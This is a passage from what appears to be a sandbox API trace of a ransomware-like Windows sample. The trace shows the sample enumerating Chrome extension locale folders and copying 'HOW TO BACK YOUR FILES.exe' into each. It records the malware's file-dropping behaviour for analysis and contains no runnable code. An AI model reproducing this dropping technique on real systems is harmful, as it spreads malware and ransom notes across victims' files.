ftLastAccessTime.dwLowDateTime=0x6da38f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da38f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.376] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" [0111.376] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" [0111.376] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.376] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.377] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.377] GetLastError () returned 0x0 [0111.378] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da5f0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da5f0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.378] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" [0111.381] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" [0111.381] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.381] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.382] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.382] GetLastError () returned 0x0 [0111.382] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da5f0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da5f0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.382] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" [0111.383] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" [0111.383] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.383] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.383] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.384] GetLastError () returned 0x0 [0111.384] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da85220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da85220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.384] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" [0111.384] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" [0111.385] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.385] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.385] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.385] GetLastError () returned 0x0 [0111.386] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.386] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da85220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da85220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.386] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv" [0111.387] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt" [0111.388] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko" [0111.388] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja" [0111.388] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it" [0111.389] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id" [0111.389] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu" [0111.390] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr" [0111.390] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi" [0111.391] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr" [0111.391] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil" [0111.391] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi" [0111.392] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es" [0111.392] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en" [0111.393] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el" [0111.393] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de" [0111.393] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da" [0111.394] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs" [0111.394] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca" [0111.395] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg" [0111.395] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar" [0111.395] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda", 